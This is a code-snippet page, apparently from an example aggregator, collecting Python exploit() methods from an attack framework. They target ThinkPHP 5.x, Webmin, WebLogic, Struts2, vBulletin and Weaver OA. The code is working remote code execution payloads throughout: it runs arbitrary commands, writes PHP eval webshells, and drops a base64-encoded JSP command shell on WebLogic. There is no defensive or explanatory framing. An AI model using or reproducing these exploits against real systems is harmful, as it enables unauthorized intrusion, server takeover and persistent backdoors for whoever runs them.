예제 #1
0
    def exploit(self):
        url = self.get_options('url')
        randomstr = self.randomstr()
        vul_param = 'echo {}'.format(randomstr)
        # <= 5.0.13
        tp5013 = {
            's': '{}'.format(vul_param),
            '_method': '__construct',
            'method': '',
            'filter[]': 'system'
        }
        # 5.0.21-5.0.22
        tp5022 = url + '/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=' + vul_param
        # 5.0.23
        tp5023 = {
            '_method': '__construct',
            'filter[]': 'system',
            'method': 'get',
            'server[REQUEST_METHOD]': '{}'.format(vul_param)
        }
        # 5.1.*
        tp51 = url + '/?s=index/\\think\Request/input&filter=system&data=' + vul_param
        explist = [tp5013, tp5022, tp5023, tp51]
        for i in range(len(explist)):
            if type(explist[i]) == dict:
                res = HttpClient().send_request_cgi(method='POST',
                                                    url=url,
                                                    data=explist[i])
                if res is not None:
                    if randomstr in res.text:
                        print_green('[+] Exploit succeed')
                        TakeControl(res).forward_shell(vul_param)
                        break
                    else:
                        print_red('[-] {0} {1}'.format(url, res.status_code))
                        print_white(res.text)

            else:
                res = HttpClient().send_request_cgi(method='GET',
                                                    url=explist[i])
                if res is not None:
                    if randomstr in res.text:
                        print_green('[+] Exploit succeed')
                        TakeControl(res).forward_shell(vul_param)
                        break
                    else:
                        print_red('[-] {0} {1}'.format(url, res.status_code))
                        print_white(res.text)

        print_blue('[*] Exploit completed')
    def exploit(self):
        url = self.get_options('url')
        command = self.get_options('command')
        vul_url = url + 'password_change.cgi'
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0',
            'Cookie': 'redirect=1; testing=1; sid=x; sessiontest=1',
            'Referer': '{}'.format(url + '/session_login.cgi')
        }
        payload = {
            'user': '******',
            'pam': '',
            'expired': '2',
            'old': 'test|{}'.format(command),
            'new1': 'test2',
            'new2': 'test2'
        }
        res = HttpClient().send_request_cgi(method='POST',
                                            url=vul_url,
                                            headers=headers,
                                            data=payload)
        if res is not None:
            if res.status_code == 200:
                print_white(res.text)
                print_green('[+] Exploit succeed,{0}'.format(vul_url))
            else:
                print_red('[-] {0} {1}'.format(vul_url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')
        return
    def exploit(self):
        url = self.get_options('url')
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'
        }
        payload = '/index.php/?s=index/\\think\\template\\driver\\file/write&cacheFile=TH1NK.php&content=<?php @eval($_POST[1]);?>'
        payload1 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=TH1NK.php&vars[1][]=<?php @eval($_POST[1]);?>'
        payload2 = '/index.php/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[1]);?>\'>TH1NK.php'
        payload3 = '/index.php/?s=index/\\think\\app/invokefunction&function=assert&vars[0]=eval($_POST[1])&vars[1][]=1'

        explist = [payload, payload1, payload2, payload3]
        for i in range(len(explist)):
            vul_url = url + explist[i]
            res = HttpClient().send_request_cgi(method='GET',
                                                url=vul_url,
                                                headers=headers,
                                                params=payload)
            if res is not None:
                if res.status_code == 200:
                    print_green('[+] Exploit succeed,{0}'.format(vul_url))
                    break
                else:
                    print_red('[-] {0} {1}'.format(url, res.status_code))
                    print_white(res.text)

            print_blue('[*] Exploit completed')
예제 #4
0
    def exploit(self):
        vul_url = self.get_options('url') + '/_async/AsyncResponseService'
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'close',
            'Content-Type': 'text/xml',
            'Content-Length': '2163',
            'cache-control': 'no-cache'
        }

        payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder">
              <void class="java.lang.ProcessBuilder">
                <array class="java.lang.String" length="3">
                  <void index="0">
                    <string>/bin/bash</string>
                  </void>
                  <void index="1">
                    <string>-c</string>
                  </void>
                  <void index="2">
                    <string>echo IDwlQCBwYWdlIGltcG9ydD0iamF2YS51dGlsLiosamF2YS5pby4qIiU+CjwlCiU+CjxIVE1MPjxCT0RZPgpDb21tYW5kcyB3aXRoIEpTUAo8Rk9STSBNRVRIT0Q9IkdFVCIgTkFNRT0ibXlmb3JtIiBBQ1RJT049IiI+CjxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgo8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iU2VuZCI+CjwvRk9STT4KPHByZT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKSB7CiAgICBvdXQucHJpbnRsbigiQ29tbWFuZDogIiArIHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7CiAgICBQcm9jZXNzIHA7CiAgICBpZiAoIFN5c3RlbS5nZXRQcm9wZXJ0eSgib3MubmFtZSIpLnRvTG93ZXJDYXNlKCkuaW5kZXhPZigid2luZG93cyIpICE9IC0xKXsKICAgICAgICBwID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYygiY21kLmV4ZSAvQyAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIGVsc2V7CiAgICAgICAgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgIH0KICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgIG91dC5wcmludGxuKGRpc3IpOwogICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CiU+CjwvcHJlPgo8L0JPRFk+PC9IVE1MPiAKCg== |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/1.jsp</string>
                  </void>
                </array>
                <void method="start"/></void>
            </java>
        </work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''
        res = HttpClient().send_request_cgi(method='POST',
                                            url=vul_url,
                                            headers=headers,
                                            data=payload)
        shell = self.get_options('url') + '/bea_wls_internal/1.jsp'
        if res is not None:
            shell_res = HttpClient().send_request_cgi(method='GET', url=shell)
            if shell_res.status_code == 200:
                print_green('[+] Exploit succeed,{0}'.format(shell))
            else:
                print_red('[-] {0} {1}'.format(vul_url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')
예제 #5
0
    def exploit(self):
        url = self.get_options('url')
        command = self.get_options('command')
        payload = quote('''${
        (#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec('%s')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
        ''' % command)

        vul_url = url + '/struts2-showcase/' + payload + '/actionChain1.action'
        res = HttpClient().send_request_cgi(method='GET', url=vul_url)
        if res is not None:
            if res.status_code == 302:
                req = re.findall('/struts2-showcase/(.*?)/register2.action', str(res.headers))
                print_green('[+] Exploit succeed, ' + str(req))
                print_blue('[*] Exploit completed')
            else:
                print_red('[-] {0} {1}'.format(vul_url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')
    def exploit(self):
        url = self.get_options('url')
        command = self.get_options('command')
        # code = self.get_options('code')
        payload = '''routestring=ajax/render/widget_php&widgetConfig[code]=echo shell_exec('{0}')'''.format(
            command)
        print_blue('[*] {0}'.format(url))
        res = HttpClient().send_request_cgi(method='POST',
                                            url=url,
                                            data=payload)
        if res is not None:
            if res.status_code == 200:
                print_green(res.text)
                print_green('[+] Exploit succeed')
            else:
                print_red('[-] {0} {1}'.format(url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')
    def exploit(self):
        url = self.get_options('url')
        command = self.get_options('command')
        headers = {
            'User-Agent':
            'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0)Gecko/20100101 Firefox/60.0'
        }
        payload = '''bsh.script=eval%00("ex"%2b"ec(\"{0}\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'
'''.format(command)
        vul_url = url + '/weaver/bsh.servlet.BshServlet'
        print_blue('[*] {0}'.format(vul_url))
        res = HttpClient().send_request_cgi(method='POST',
                                            url=vul_url,
                                            headers=headers,
                                            data=payload)
        if res is not None:
            if res.status_code == 200:
                print_green(res.text)
                print_green('[+] Exploit succeed')
            else:
                print_red('[-] {0} {1}'.format(vul_url, res.status_code))
                print_white(res.text)

        print_blue('[*] Exploit completed')